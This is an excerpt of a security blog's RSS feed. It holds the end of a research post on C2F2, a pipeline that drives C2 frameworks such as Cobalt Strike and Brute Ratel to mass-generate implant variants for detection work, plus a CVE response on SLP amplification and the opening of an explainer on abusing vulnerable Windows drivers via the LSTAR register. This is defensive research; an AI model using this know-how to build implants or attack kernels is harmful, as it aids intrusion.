</span><span data-contrast="none">By analyzing this large collection of samples, security professionals can also gain insights into the tactics, techniques, and procedures (TTPs) used by threat actors to develop and deploy these implants.</span></p> <h2 aria-level="1"><span data-contrast="none">C2F2: A C2 Framework Framework</span><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2> <p><span data-contrast="auto">The C2 frameworks targeted by C2F2 are the following:</span><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li><a href="https://bruteratel.com/"><span data-contrast="none">Brute Ratel</span></a><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://www.cobaltstrike.com/"><span data-contrast="none">Cobalt Strike</span></a><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://github.com/cobbr/Covenant"><span data-contrast="none">Covenant</span></a><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://github.com/BC-SECURITY/Empire"><span data-contrast="none">Empire</span></a><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://github.com/sensepost/godoh"><span data-contrast="none">Godoh</span></a><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://github.com/Ne0nd0g/merlin"><span data-contrast="none">Merlin</span></a><span 
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://www.offsec.com/metasploit-unleashed/ab ]]> <![CDATA[ out-meterpreter/"><span data-contrast="none">Meterpreter</span></a><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://github.com/nettitude/PoshC2"><span data-co ]]> <![CDATA[ ntrast="none">PoshC2</span></a><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://github.com/bats3c/shad0w"><span data-contrast="none">Shad0w</span></a><span da ]]> <![CDATA[ ta-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><a href="https://github.com/BishopFox/sliver"><span data-contrast="none">Sliver</span></a><span data-ccp-props="{"134245418" ]]> <![CDATA[ :true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><span data-contrast="none">Before diving into the implant generation process, we had to take several preparatory steps to ensure that the process can run smoothly an ]]> <![CDATA[ d effectively. Firstly, we had to understand the set of possible options and respective values for each C2 framework. Secondly, it was necessary to understand how to instrument and interact with each C2 framework to generate the implant. </span><span data-ccp-props="{"201341983":0,"3 ]]> <![CDATA[ 35559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">Interacting with various C2 frameworks can be a challenging task due to their differing interfaces. While some frameworks, like Sliver, offer user-friendly command-line interfaces with multiple options, others ]]> <![CDATA[ can only be queried via bespoke mechanisms; for example, Cobalt Strike can only be interacted with using the Aggressor Script language. 
Additionally, Brute Ratel and Covenant proved to be the most challenging. The former required us to fully reverse-engineer the communication protocol used by the C ]]> <![CDATA[ 2 server and the implant, while the latter, despite having various functionality exposed via a RESTful API, required us to create the missing implant generation functionality ourselves.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </spa ]]> <![CDATA[ n></p> <p><span data-contrast="none">Specifically, the Brute Ratel’s protocol requires the client to perform authorization twice: the first time by sending the login and the password via an HTTP POST request, and then the second time with the token, received from the first authorization attempt, s ]]> <![CDATA[ ent via a newly established WebSocket channel. After successful authorization, the WebSocket connection is used for client-server communication where the client sends commands (e.g., “create a badger profile with the following parameters”) and the server replies with status codes and the additio ]]> <![CDATA[ nal data (e.g., with a Base64-encoded payload) that the client might have requested. Both channels (the initial POST request and the WebSocket connection) are JSON-based and use HTTPS as a transport layer.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740 ]]> <![CDATA[ ":259}"> </span></p> <p><span data-contrast="none">Covenant, on the other hand, has a documented set of APIs, that include functions to create implants. The APIs are based on JSON and use HTTPS as a transport layer. While most of the functions indeed generate implants, some of them (e.g., the function to generate a .NET executable implant) return no payload with the standard reply. The payload is generated but never returned because that functionality is not implemented. 
To overcome this limitation, the code of the framework was amended to store the generated payload on disk.</span><sp ]]> <![CDATA[ an data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">Once the options for each implant type had been identified, we used a domain-specific language (DSL) to express them in a format that can be easily consumed b ]]> <![CDATA[ y the implant-generation process. This required careful consideration and planning to ensure that the process is efficient and scalable. Finally, we implemented an algorithm that given the grammar of one of the implant configurations expressed with our DSL, can generate random configurations that ar ]]> <![CDATA[ e consistent with it. These configurations are then used to generate the implants. This approach can be used to generate a large number of implant variations, each tailored to specific target environments, and can be used to test the effectiveness of various detection and defense strategies and to g ]]> <![CDATA[ enerate signatures or detection procedures.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <h2 aria-level="1"><span data-contrast="none">Architecture</span><span data-ccp-props="{"134245418":true,"134245529" ]]> <![CDATA[ ;:true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2> <p><span data-contrast="none">We designed our framework based on two key properties of the problem we needed to solve. Firstly, generating a single implant can be a time-consum ]]> <![CDATA[ ing process that may take several minutes to complete due to the complexity of the steps involved; for example, in the case of Cobalt Strike, creating a Malleable C2 profile, starting a Cobalt Strike server, using Aggressor Scripts to generate the implant binary, and waiting for the result to be pro ]]> <![CDATA[ duced require several minutes. 
Secondly, the process of generating one implant is independent of other implants, meaning that multiple implants can be generated simultaneously in parallel, which can significantly increase the efficiency of the process. To address these two factors, we ensured that o ]]> <![CDATA[ ur framework was capable of handling asynchronous long-lasting jobs and designed it to be easily parallelizable.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">Our infrastructure consists of four ]]> <![CDATA[ key components that work together to facilitate the process of generating implants:</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li><b><span data-contrast="none">Generator</span></b><span data-contrast="none">: This co ]]> <![CDATA[ mponent retrieves the correct grammar based on the specified C2 framework type and generates a random implant configuration. The configuration is then stored in the designated storage backend for future use.</span><span data-ccp-props="{"201341983":0,"335559739":160,"3355597 ]]> <![CDATA[ 40":259}"> </span></li> <li><b><span data-contrast="none">Submitter</span></b><span data-contrast="none">: Once an implant configuration is available, the submitter creates a job and sends it to the appropriate queue based on the configuration type.</span><span data-ccp-props="{"201341983 ]]> <![CDATA[ ":0,"335559739":160,"335559740":259}"> </span></li> <li><b><span data-contrast="none">Receiver</span></b><span data-contrast="none">: This component pulls jobs from the queue and sets up the worker to generate the corresponding implant. 
Once the job is completed, the receiv ]]> <![CDATA[ er collects the result.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><b><span data-contrast="none">Worker</span></b><span data-contrast="none">: Each worker is specialized in generating implants for a specific C2 framew ]]> <![CDATA[ ork. Given an implant configuration, the worker generates the corresponding implant. By dividing the workload across multiple workers, our infrastructure is able to generate multiple implants in parallel, significantly reducing the time required to generate large numbers of implants. Overall, these ]]> <![CDATA[ components work seamlessly together to automate the implant generation process and improve the efficiency of our system.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"><br /> </span></li> </ul> <p><a href="https://blogs.vmware.com/security/ ]]> <![CDATA[ files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83466" src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1024x452.png" alt="" width="900" height="397" srcset="https://blogs.vmware.com/secur ]]> <![CDATA[ ity/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1024x452.png 1024w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-300x132.png 300w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-768x339.png 768w, https://blogs.vmwar ]]> <![CDATA[ e.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1536x678.png 1536w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-2048x904.png 2048w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-600x265.png 600w" sizes= ]]> <![CDATA[ "(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span data-contrast="none">Figure </span></i><i><span 
data-contrast="none">2</span></i><i><span data-contrast="none">: C2F2 architecture for the generation of implant at scale.</span></i><span data-ccp-props="{"201341983":0,"335551550 ]]> <![CDATA[ ":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <p><span data-contrast="none">As shown in </span><span data-contrast="auto">Figure 2</span><span data-contrast="none">, the workflow for generating implants using the C2F2 system can be broken down i ]]> <![CDATA[ nto the following steps: </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ol> <li><span data-contrast="none">The user chooses the C2 framework type and the number of implants to be generated and initiates the process.</span>< ]]> <![CDATA[ span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><span data-contrast="none">The generator component retrieves the appropriate grammar and generates the given number of random implant configurations, which are then stored in the se ]]> <![CDATA[ lected storage backend.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><span data-contrast="none">The submitter creates a job for each generated configuration and sends it to the appropriate queue based on its type.</span ]]> <![CDATA[ ><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><span data-contrast="none">The receiver pulls jobs from the queue and sets up the appropriate specialized worker.</span><span data-ccp-props="{"201341983":0,"335559 ]]> <![CDATA[ 739":160,"335559740":259}"> </span></li> <li><span data-contrast="none">The worker reads the configuration file and, using the appropriate C2 framework, generates the implant.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> ]]> <![CDATA[ </span></li> <li><span data-contrast="none">Once the worker has generated the implant, the receiver collects the result and stores it in 
the designated storage backend.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li><sp ]]> <![CDATA[ an data-contrast="none">Steps 4, 5, and 6 are repeated until the queue is empty.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ol> <p><span data-contrast="none">Alternatively, the user can provide a custom implant configur ]]> <![CDATA[ ation, in which case the submitter sends the job directly to the appropriate queue and the process continues as usual.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">Overall, this process ensures ]]> <![CDATA[ that implant generation is standardized and customizable, making it more efficient and effective.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <h2 aria-level="1"><span data-contrast="none">Configuration Generation</span><spa ]]> <![CDATA[ n data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2> <p><span data-contrast="auto">Generating a vast number of valid C2 implant configurations was a top priority w ]]> <![CDATA[ hen designing the C2F2 implant generation system. To achieve this goal, we aimed to significantly minimize the need for manual intervention. This involved just one initial step in our exploratory phase, where researchers from our team read each C2 framework specification and encoded the set of all p ]]> <![CDATA[ ossible configuration types in our domain-specific language. Thanks to having the models expressed in a DSL, we could generate configuration files that were valid by default, adhering to the grammar encoded in the model. 
Furthermore, the model (showcased in </span><span data-contrast="auto">Figure 3 ]]> <![CDATA[ </span><span data-contrast="auto">) also allows us to verify any external configurations, guaranteeing that only valid configurations entered our system.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><a href="https://blogs ]]> <![CDATA[ .vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83467" src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1024x411.png" alt="" width="900" height="361" srcset="https://b ]]> <![CDATA[ logs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1024x411.png 1024w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-300x120.png 300w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-768x308.png 768w ]]> <![CDATA[ , https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1536x616.png 1536w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-600x241.png 600w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM.png 1 ]]> <![CDATA[ 700w" sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">3</span></i><i><span data-contrast="none">: Generation and validation of models in C2F2.</span></i><span data-ccp-props="{"201341983":0,"335551550& ]]> <![CDATA[ quot;:2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <p><span data-contrast="auto">To encode our configuration models, we decided to utilize </span><a href="https://docs.pydantic.dev/"><span data-contrast="none">Pydantic,</span></a><span data-contrast=" ]]> <![CDATA[ auto"> a Python library for data validation that uses the Python type system. 
Our decision to use Pydantic was based on multiple factors. Firstly, it allowed us to encode the models directly using Python’s syntax. This made it easier for our team to work with the tool and allowed us to quickly bui ]]> <![CDATA[ ld understanding and expertise. Additionally, Pydantic provides a high degree of flexibility, making it perfect for our needs.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">To give an example of ]]> <![CDATA[ how Pydantic can be used, we can examine one of our implant models created for the Shad0w C2 framework. The model is shown in </span><span data-contrast="auto">Figure 4</span><span data-contrast="auto">.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740&q ]]> <![CDATA[ uot;:259}"> </span></p> <p><a href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83468" src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1024x441.png" ]]> <![CDATA[ alt="" width="900" height="388" srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1024x441.png 1024w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-300x129.png 300w, https://blogs.vmware.com/security/files/2023/04/Scr ]]> <![CDATA[ een-Shot-2023-04-26-at-3.01.03-PM-768x331.png 768w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1536x661.png 1536w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-600x258.png 600w, https://blogs.vmware.com/security/files/ ]]> <![CDATA[ 2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM.png 1658w" sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">4</span></i><i><span data-contrast="none">: Model generated 
for Shad0w.</span></i><span data-ccp-props="{"2 ]]> <![CDATA[ 01341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <p><span data-contrast="auto">Pydantic offers more flexibility than just using primitive types when defining our model types. For example, it allows us to have more control over the value range for a given field, and it also supports more complex types such as enumeration and custom types. After defining our models, Pydantic allows us to obtain the schema definition as a Python dictionary, which is then parsed and interpreted as the model grammar by our generator. Furthermore, Pydantic also provides a method for us to validate a random JSON against the model schema, ensuring that the generated configs adhere to the specifications.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">A concrete example of a generated valid configuration file for Shad0w can be observed in </span><span data-contrast="auto">Figure 5</span><span data-contrast="auto">. 
The generated configuration validates against the Shad0w model schema and is interpretable by our system.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><a href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83469" src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-1024x552.png" alt="" width="800" height="431" srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-1024x552.png 1024w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-300x162.png 300w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-768x414.png 768w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-410x222.png 410w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-600x323.png 600w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM.png 1036w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">5</span></i><i><span data-contrast="none">: Valid configuration generated for Shad0w.</span></i><span data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <h2 aria-level="1"><span data-contrast="none">Conclusions</span><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2> <p><span data-contrast="auto">In this blog post we presented C2F2, a framework designed to instrument existing C2 frameworks. We show how it is possible to leverage C2F2 to generate a large dataset of implants by leveraging the configuration options provided by the selected C2 frameworks. 
Generating a large number of implants is the first building block of any pipeline designed to analyze and behaviorally detect backdoors at scale. While we are working on releasing the framework to the public by mid-2023, we hope that providing an early preview can foster further discussions and feedback on the topic from the community.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto"> </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">It’s Raining Implants: How to Generate C2 Framework Implants At Scale</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... </item> <item> <title>VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS) Amplification Vulnerability in SLP</title> <link>https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html?utm_source=rss&utm_medium=rss&utm_campaign=vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp</link> <dc:creator> <![CDATA[ Edward Hawkins ]]> ... </dc:creator> <pubDate>Tue, 25 Apr 2023 14:08:33 +0000</pubDate> <category> <![CDATA[ VMware Security Response Center ]]> ... 
</category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83452</guid> <description> <![CDATA[ <div><img width="300" height="163" src="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png 300w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1024x555.png 1024w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-768x416.png 768w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1536x832.png 1536w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-410x222.png 410w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-600x325.png 600w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-415x225.png 415w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-585x318.png 585w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-380x207.png 380w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-222x120.png 222w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured.png 1709w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Greetings from the VMware Security Response Center! Today we wanted to address CVE-2023-29552 – a vulnerability in SLP that could allow for a reflective denial-of-service amplification attack that was disclosed on April 25th, 2023. VMware has investigated this vulnerability and determined that currently supported ESXi releases (ESXi 7.x and 8.x lines) are not impacted. 
However, … <a href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS) Amplification Vulnerability in SLP</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </description> <content:encoded> <![CDATA[ <div><img width="300" height="163" src="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png 300w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1024x555.png 1024w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-768x416.png 768w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1536x832.png 1536w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-410x222.png 410w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-600x325.png 600w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-415x225.png 415w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-585x318.png 585w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-380x207.png 380w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-222x120.png 222w, https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured.png 1709w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>Greetings from the VMware 
Security Response Center!</p> <p>Today we wanted to address CVE-2023-29552 – a vulnerability in SLP that could allow for a reflective denial-of-service amplification attack that was disclosed on April 25th, 2023.</p> <p>VMware has investigated this vulnerability and determined that currently supported ESXi releases (ESXi 7.x and 8.x lines) are not impacted.</p> <p>However, releases that have reached end of general support (EOGS) such as 6.7 and 6.5 have been found to be impacted by CVE-2023-29552. As per previous guidance and best practice VMware recommends that the best option to address CVE-2023-29552 is to upgrade to a supported release line that is not impacted by the vulnerability. ESXi 7.0 U2c and newer, and ESXi 8.0 GA and newer, ship with the SLP service hardened, disabled by default, and filtered by the ESXi firewall. In lieu of an upgrade to a supported release, ESXi admins should ensure that their ESXi hosts are not exposed to untrusted networks and also disable SLP following the instructions in <a href="https://kb.vmware.com/s/article/76372" target="_blank" rel="noopener">KB76372</a>.</p> <p>VMware would like to thank Bitsight and CISA for reporting this vulnerability to us.</p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS) Amplification Vulnerability in SLP</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... 
</item> <item> <title>Bring Your Own Backdoor: How Vulnerable Drivers Let Hackers In</title> <link>https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html?utm_source=rss&utm_medium=rss&utm_campaign=bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in</link> <dc:creator> <![CDATA[ Dana Behling ]]> ... </dc:creator> <pubDate>Wed, 19 Apr 2023 17:56:42 +0000</pubDate> <category> <![CDATA[ Threat Analysis Unit ]]> ... </category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83445</guid> <description> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png 300w, https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png 410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Bring Your Own Vulnerable Driver (BYOVD) techniques are not new; they can be traced back at least as far as 2012 and the Shamoon wiper that targeted Saudi Aramco. The attack used RawDisk driver, which could manipulate hard drives from user space without any special permissions. This access enabled the malicious actor to erase data … <a href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Bring Your Own Backdoor: How Vulnerable Drivers Let Hackers In</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... 
</description> <content:encoded> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png 300w, https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png 410w" sizes="(max-width: 300px) 100vw, 300px" /></div>
<p>Bring Your Own Vulnerable Driver (BYOVD) techniques are not new; they can be traced back at least as far as 2012 and the <a href="https://en.wikipedia.org/wiki/Shamoon">Shamoon</a> wiper that targeted Saudi Aramco. The attack used the <a href="https://attack.mitre.org/software/S0364/">RawDisk driver</a>, which could manipulate hard drives from user space without any special permissions. This access enabled the malicious actor to erase data at such a large scale that the company was forced to replace practically all hard drives on its network. The Shamoon/RawDisk attack did not use a vulnerability in the driver; it used the driver for its intended purpose, but by a person or group with unscrupulous objectives. In the case of Shamoon, the driver itself could be considered a vulnerability, and in some ways this is the case with almost all vulnerabilities: the misuse of well-intended segments of code necessary for functionality results in calamity.</p>
<p>This paper provides an overview of common driver vulnerabilities for currently supported versions of Windows running on the x86-64 architecture. Some driver principles and concepts can be applied across operating systems, but for brevity the scope is limited. It is intended as a high-level introduction to the topic of driver vulnerabilities in Windows.</p>
<h2>What is a driver?</h2>
<p>At an exceedingly high level, drivers are software that allows the operating system to interact with all the different physical parts of a computer. Each physical component of a computer is commonly referred to as a device, which is why drivers are commonly referred to as device drivers. This differentiates them from purely software drivers, which are low-level programs that act as filters or perform some other low-level function. It is normal for each device on the computer to have at least one driver. For example, in high-performance computing it is common to have a separate card or piece of hardware for processing video (a video card). In general, the manufacturer of the video card will write a driver or multiple drivers, at least one for each supported operating system. These drivers facilitate communication between the physical device and the operating system and enable full use of the specialized hardware. Since device drivers act as a bridge between the operating system and physical hardware, it follows that they require intimate access to guarded components of the operating system that not all applications are allowed to use. For this reason, they are an attractive option for dishonest cyber actors whose goal is to implant undetectable, difficult-to-remove malicious code on a system.</p>
<p>Admittedly, this is an oversimplification, but it provides a baseline for understanding the techniques that follow. For a more complete explanation of Windows drivers see Microsoft’s “<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/what-is-a-driver-">What is a driver?</a>”</p>
<h2>What makes a driver vulnerable?</h2>
<p>Since drivers are software, they are susceptible to all the vulnerabilities of software in general, but the sections below provide a high-level overview of the most common vulnerabilities specific to drivers. In most cases, some combination or variation of these techniques is used for driver exploitation. As in other instances of software exploitation, many of the constructs that are manipulated are also required for the normal operation of a system, and when abused, these same constructs can result in behaviors not intended by the original authors.</p>
<h2>Function Calls from Model Specific Registers (MSRs)</h2>
<p><a href="http://datasheets.chipdb.org/Intel/x86/Pentium/Embedded%20Pentium%AE%20Processor/MDELREGS.PDF">Model-specific registers</a> (MSRs) are a set of special-purpose data-holding places on most computer processors that are available to drivers and are used for debugging, performance monitoring, and enabling/disabling CPU/GPU features. One common use of these registers is to collect environmental measurements related to the driver’s hardware, for example temperature or voltage. These data points can be essential for the device to function properly.</p>
<p>A closer look at how MSRs operate reveals the problem. Within the set of MSRs one register is of particular interest, <a href="https://software.intel.com/content/www/us/en/develop/download/intel-64-and-ia-32-architectures-software-developers-manual-volume-4-model-specific-registers.html">IA32_LSTAR</a> (IA-32e Mode System Call Target Address R/W), commonly referred to by the shortened name LSTAR. This register allows drivers to make system calls. Normal operation dictates that the driver places the address of the system call it wants to make in the LSTAR register, and then signals for it to be called. A system call is a function or action that triggers something to happen in the operating system itself; these types of operations are considered privileged and only trusted software is allowed to use them. Since drivers are trusted, this is not a problem. However, in the case of a basic MSR attack the address of the system call in LSTAR is replaced with the address of non-trusted code. Now when the driver triggers what it thinks is a system call, the imposter code is executed as if it were a trusted part of the operating system.</p>
<p>Techniques that involve overwriting the LSTAR register are no longer quite as straightforward as presented. Microsoft has implemented security measures to make abuse more complicated, but the basics of the technique remain the same. The difference is that it now requires multiple exploits to place the untrusted code in memory, change LSTAR, and subsequently trigger the system call.</p>
